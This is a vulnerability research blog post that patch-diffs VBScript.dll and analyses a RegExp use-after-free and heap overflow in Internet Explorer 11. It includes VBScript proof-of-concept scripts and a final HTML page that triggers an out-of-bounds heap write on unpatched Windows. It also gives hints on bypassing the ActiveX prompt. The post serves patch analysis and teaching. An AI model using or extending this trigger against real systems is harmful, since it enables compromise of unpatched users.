Apr 02, 2019

Vulnerability Research

Analysis of a VB Script Heap Overflow (CVE-2019-0666)

Marcus Hutchins

Anyone who uses RegEx knows how easy it is to shoot yourself in the foot; but, is it possible to write RegEx so badly that it can lead to RCE? With VB Script, the answer is yes!

In this article I’ll be writing about what I assume to be CVE-2019-0666. The March 2019 security patch fixes multiple bugs in the same code, so the CVE number is uncertain.

Note: this bug was not found by me, I reverse engineered it from the March 2019 security patch.

Binary Comparison

Running a BinDiff between the pre and post patch VBScript.dll, we can see only a few changes are returned.

Difference between VBScript before and after installing the latest patch.

The two changes in the RegExp class caught my eye. It’s easy to see how a bug could occur in something as complex as a RegEx parser. Let’s start here.

RegExp::AddRef

Old AddRef on the left, updated one on the right.

This change is very simple, but requires an understanding of reference tracking:

A reference to an object is created: the reference counter is incremented by 1.
A reference to an object is deleted: the reference counter is decremented by 1.
The reference counter reached 0: object can be deleted.

Reference tracking is designed to prevent deallocation of in-use objects (use-after-free). An object ~~will~~ should never be deleted until all its’ references destroyed.

The updated function causes the interpreter to exit if the reference count increments above 0x7FFFFFFF (the highest value of a signed integer). The reason for the update is to prevent a potential integer overflow.

Theoretically, by creating enough references, one could loop the reference counter back around to zero. Once the counter is zero, the object could be freed while references still exist.

In reality, to cause an integer overflow we’d have to create 4,294,967,296 references. Optimistically assuming a single reference is only 4 bytes, that’d require use around 17 GB of RAM. Though, we’d hit the interpreter memory limit long before.

Alone, this bug is not a threat; however, in combination with another bug it could lead to use-after-free (UAF). For example: a reference leak.

RegExpExec::ReplaceUsingCallable

Note: this function is too large to embed in full, so I’ve just pulled out only the relevant changes.

The code now creates a copy of the memory pointed to by a6 (argument 6). To understand the reasoning for this, let’s look at the next modification.

Change 2: somewhere in the middle of RegExpExec::ReplaceUsingCallable.

The old code verified that a6 pointed to Buf1. Now there exists an additional check comparing Buf1 with the copyof *a6 made earlier (Buf2).

The very existence of code validating that a6 points to Buf1 tells us something important: a6 should point to Buf1, but there’s a possibility it might not. Furthermore, the new check implies it may be possible to change Buf1 between the first and 2nd call to Exec.

Already, I’m fairly sure we’re looking for a use-after-free. The update is now verifying that a6 still points to Buf1, and that Buf1’s content hasn’t changed.

There’s a logical reason these two checks would co-exist: Buf1 is some allocated memory, which can be freed during the call to ReplaceUsingCallable(). Assume Buf1 was freed, and something else was allocated in its’ place: *a6 would still point to Buf1, but Buf1 would now contain different data. Now the code has been patched to also validate Buf1 remains unchanged.

To understand the patched bug more, we need to understand RegExp.

RegExp Replace

RegExp has a replace function which replaces one or more matches of a given pattern with a given value. Take this code for example:

Set regex = New RegExp
regex.Pattern = "a"
regex.Global = False
MsgBox regex.replace("aaa", "b")

The above code would replace the first instance of “a” in the string “aaa” with “b”; therefore, MsgBox would output “baa”. Stepping through the call, I found that internally the replace() method calls ReplaceUsingString(). We need to get to ReplaceUsingCallable(), and I’m pretty sure i know how.

ReplaceUsingCallable

As the name implies, we can probably call replace() using a callable objected as a parameter. I did some more digging to figure out how [1].

The following code does the same as the previous version, but invokes ReplaceUsingCallable() instead.

Set regex = New RegExp
regex.Pattern = "a"
regex.Global = False
MsgBox regex.replace("aaa", GetRef("lolRegex"))

Function lolRegex(singleMatch, position, fullString)
    lolRegex = "b"
End Function

Basically, whenever the pattern gets matched the function “lolregex” gets called (this is known as a callback). The callback must return what ever we want the pattern to be replaced with (in our case “b”).

Now I’m even more sure this is some kind of use-after-free. My guess is that during the callback we can free Buf1 and allocate something else at same address. But first, we must know what Buf1 is.

The Mystery of Buf1

Buf1 is passed as a function argument, so i set a breakpoint at the start of ReplaceUsingCallable(). My breakpoint was triggered, then I navigated to Buf1’s memory.

Using WinDbg to verify that Buf1 is in fact allocated on the heap.

Buf1 is allocated on the heap; there are also two “a” towards the end of the memory. Figuring the ‘a’s might be related to my RegEx pattern, I changed the pattern to “lolregex”.

Success! Now I know that Buf1 is related to my RegEx pattern.

My callback is invoked in the middle of ReplaceUsingCallable(), so I decided to modify pattern there.

Set regex = New RegExp
regex.Pattern = "a"
regex.Global = False
MsgBox regex.replace("aaa", GetRef("lolRegex"))

Function lolRegex(singleMatch, position, fullString)
    'Change the RegEx pattern during the callback

    regex.Pattern = "I probably shouldn't be allowed to do this"
    lolRegex = "b"
End Function

The script returned the error code 0x80004005. A single location returns
0x80004005; it’s the pointer check from earlier.

I set a breakpoint on the pointer check and inspected both *a6 and Buf1. Buf1 is still the address of my old RegEx pattern (which has now been deallocated). Unfortunately, *a6 is now set to null. Exploit this bugwould require setting *a6 back to the address of Buf1.

Passing The Pointer Validation

After a fair amount of reverse engineering, I found the problem: although setting regex.Pattern to a new value frees Buf1, it doesn’t allocate a new buffer.

put_Pattern gets called when a value is assigned to the regex.Pattern.

Digging deeper, I discovered the function RegExpComp::Compile() is responsible for creating Buf1. Unfortunately, we can’t explicitly call regex.compile() in VBScript (though in other languages it is possible).

Due to the fact compile() is a VTable function, I can’t just look at XRefs to see where it gets invoked. Instead, I set a breakpoint at the start of Compile(); then I inspected the callstack.

Somewhat unsurprisingly, compile() gets invoked during a call to regex.replace(). By making a redundant call to replace() inside the callback, it’s possible to force compile my new pattern.

Set regex = New RegExp
regex.Pattern = "a"
regex.Global = False
MsgBox regex.replace("aaa", GetRef("lolRegex"))

Function lolRegex(singleMatch, position, fullString)
    regex.Pattern = "I probably shouldn't be allowed to do this"
    call regex.replace("", "") 'force pattern compile but do nothing

    lolRegex = "b"
End Function

Now when I run my script the check fails again, but for a different reason.

\*a6 is set again, but not to the address Buf1.

The problem here is simple: the new compiled pattern must be allocated at the same address as the old one. It’s not possible to explicitly decide where heap memory is allocated; however, there is a workaround.

Heap Exploitation Problems

I’m not going to go too deep into how the heap works here. If you’d like a more in-depth understand, I suggest reading the original paper on “Heap Feng Shui” [2].

When allocating small blocks of memory, the heap allocator uses an algorithm to select some free space.

Heap Coaleasing

Upon freeing a block, the heap allocator checks if either of the adjacent blocks are also free. If two neighboring blocks are free, the are merged into a larger block (coalescing).

An example heap layout prior to Allocated Block 1 being freed.

Upon freeing Allocated Block 1, the freed space is merged with Free Block 1 & 2.

Coalescing is a problem when trying to exploit a use-after-free. If the block we need to reallocate is coalesced downwards, then the new buffer would be allocated at a lower address.

To stop coalescing from occurring, we can abuse the low-fragmentation heap (LFH).

The Low Fragmentation Heap

Heap allocations are inherently slow, due to the fact the allocator must search for a free block to fit the requested size.

The LFH improves performance by grouping together allocations of the same size. Let’s assume a 30 byte allocation is requested: if there’s a dedicated heap where all allocations are 30 bytes, then the allocator can simply return the 1st free block (no need to check the size). Because all blocks on the LFH must be the same size, coalescing is disabled.

Windows XP and below do not support the LFH. Though, this isn’t a problem because such systems are easy to exploit via other heap exploitation techniques (due to lack of mitigations).

LFH Allocation Order Randomization

On Windows 8 and above, a new mitigation was introduced to further complicate UAF exploitation. The LFH now no longer allocates blocks consecutively, instead the order is randomized. The allocator holds a list of free blocks, picking one at random each time an allocation is requested.

Luckily, LFH randomization is not a problem for us; I’ll explain why.

When a UAF exploit fails to re-allocate the target address, 1 of 3 things usually occurs.

the memory is left unallocated, in which case the program crashes trying to use uninitialized memory.
the memory gets re-allocated by something else, in which case the program crashes trying to use some random data.
the program performs sanity checks on the memory, failing safely if something unexpected is located there.

Remember the pointer check we’re trying to bypass? It basically validates the memory was allocated by a call to RegExpComp::Compile (i.e. contains a valid RegEx pattern). If we fail to re-allocate the same address, we won’t bypass the pointer check, thus the program won’t crash!

All we need to do is set up an exception handler, then just keep trying to allocate the new pattern at the old address. Whoever said security checks are bad for exploit developers?

<pre lang="vb">'Just keep swimming...

On Error Resume Next

Set regex = new RegExp
regex.Global = False

'Re-allocate the pattern 19 times to enable LFH for this size allocation

For idx=0 To 19
    regex.Pattern = pattern
    call regex.Replace("", "")
Next

'Attempt to trigger the use-after-free up to 5000

For idx=0 To 4999
    regex.Pattern = "aaaaa"
    retval = regex.Replace("aaaaabbbbb", GetRef("lolRegex"))

    'if function returns succesfully, then our use-after-free succeeded

    If retval Then
        MsgBox "Attempt number " & idx & " succeeded!", 48, "Great Success!!!"
        Exit For
    End If
Next

Function lolRegex(singleMatch, position, fullString)
    'replace pattern with one of same size so it goes on same LFH

    regex.Pattern = "bbbbb"
    call regex.Replace("", "") 'force pattern compile

    lolRegex = "c"
End Function

Running the new script, we’ll get something like this (even on Windows 10 with all heap mitigations enabled).

Now the question is, how is this helpful? To use the LFH, both the old and new patterns must be equal size. Why would replacing one RegEx pattern with another one of the same size be exploitable? Well, in this case size doesn’t matter…

A Pattern of Malicious Behavior

I went looking for allocations made based on data contained in the pattern buffer. Next I narrowed down the allocations to those made before I replace the pattern buffer, but used afterwards. I found one.

RegExpExec::Cgrp reads a variable from the compiled pattern called “Cgrp” (group).

After looking into the compilation of the pattern, I came to understand that “Cgrp” is the number of groups in the RegEx pattern. The allocation is done prior to calling ReplaceUsingCallable(); therefore, persists throughout my reallocation of the pattern.

RegExp::ReplaceUsingCallable() makes multiple calls to a function named
RegExpExec::Exec(). Exec() is responsible for performing the actual pattern matching; inside is the following code.

sets all bytes of the previously allocated group_array to 0xFF.

The memset is done based on my pattern’s Cgrp value; which, I can change. If I recompiled the pattern with one of the same size, but with more regex groups, I’d overflow “group_array”.

For example, the pattern “aaaaaa” contains 1 group, whilst “(a)(a)” contains 2 groups and is the same length. Due to the fact the memset sets the entire buffer, the size of the pattern in each group is irrelevant.

RegEx(ploit) Requirements

In order to perform a successful heap overflow, there are some requirements.

Firstly, RegExpExec::Exec() must be called after I replace the pattern buffer. This can be done by setting the RegExp.Global option to True.

When Global is set, RegExp::ReplaceUsingCallable will replace every instance of the given pattern. The flow is as follows.

Call RegExpExec::Exec() to see determine if there are any matches of the regex pattern in the source string.
If a pattern match is found, invoke the supplied callback.
Replace the match with the value returned by the callback.
If global is set, enter a loop performing 1 – 3, until all matches are replaced.

What I can do is set Global to True, then create a string which matches the original pattern at least twice. When the callback is called, I will replace the pattern with one of the same size, but containing more groups. Upon the second call to Exec(), a heap overflow will occur.

After some calculation, I found a single and multi-group pattern of the same internal size. My malicious pattern contains 30 groups, whilst the original contains only 1.

malicious_pattern = "(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)"
original_pattern = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The finalized code will overflow the heap with invalid data, leading to a program crash. For demonstration, I’ve chained the bug with CVE-2019-0768, which allows execution of VBScript in IE11.

<title>lolregex</title><meta content="IE=10" http-equiv="x-ua-compatible"></meta><script language="VBScript">
'Just keep swimming...

On Error Resume Next

malicious_pattern = "(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)"
original_pattern = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 

Set regex = new RegExp
regex.Global = True

'Re-allocate the pattern 19 times to enable LFH for this size allocation

For idx=0 To 19
    regex.Pattern = original_pattern
    call regex.Replace("", "")
Next

'Attempt to trigger the use-after-free up to 10,000 times

For idx=0 To 9999
    regex.Pattern = original_pattern

    'ensure source_string matches original_pattern by appending it twice

    source_string = original_pattern & original_pattern
    retval = regex.Replace(source_string, GetRef("lolRegex"))

    'if function returns succesfully, then our use-after-free succeeded

    If retval Then
        MsgBox "Attempt number " & idx & " succeeded!", 48, "Great Success!!!"
        Exit For
    End If
Next

Function lolRegex(singleMatch, position, fullString)
    'replace pattern with one of same size so it goes on same LFH

    regex.Pattern = malicious_pattern
    call regex.Replace("", "") 'force pattern compile

    lolRegex = "c"
End Function
</script>

Now, let’s visit the page using IE11 on a system without the March 2019 security patch! I used Windows 7 because most crashes are silent on Windows 10.

Conclusion

The exploit offers a decent out-of-bounds (OOB) write primitive, which can be targeted at either the general or low-fragmentation heap. With such a primitive, it’s possible to escalate to arbitrary read/write, thus RCE. For obvious reasons, I will not be providing any information on how to achieve a weaponized exploit.

Interestingly, the “Enable ActiveX” prompt can be bypassed. Compiling the script into a safe-for-initialization ActiveX object leads to it being run immediately, without warning. Furthermore, the exploit can be triggered in any application that hosts the IE rendering engine. It may even be possible to trigger code execution from within an Office document, without macros enabled.

Anyway, that’s all! Thank you for coming to my talk on how to write safe and secure RegEx!

References

VBScript RegEx Callbacks –
http://cwestblog.com/2011/07/18/vbscript-regexp-replace-using-a-callback-function/
Heap Feng Shui –
https://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf

Share this article

Bluesky

Analysis of a VB Script Heap Overflow (CVE-2019-0666)

Binary Comparison

RegExp::AddRef

RegExpExec::ReplaceUsingCallable

RegExp Replace

ReplaceUsingCallable

The Mystery of Buf1

Passing The Pointer Validation

Heap Exploitation Problems

Heap Coaleasing

The Low Fragmentation Heap

LFH Allocation Order Randomization

A Pattern of Malicious Behavior

RegEx(ploit) Requirements

Conclusion

References

Stay Informed

Featured Posts

Explore Topics

Explainers

Malware

Windows Internals

Hacking

Vulnerability Research

News

Analysis

Malware Analysis

Programming

Threat Intelligence

Opinions

Stories

WannaCry

Videos

Artificial Intelligence

Technology

Offensive Security

You may also like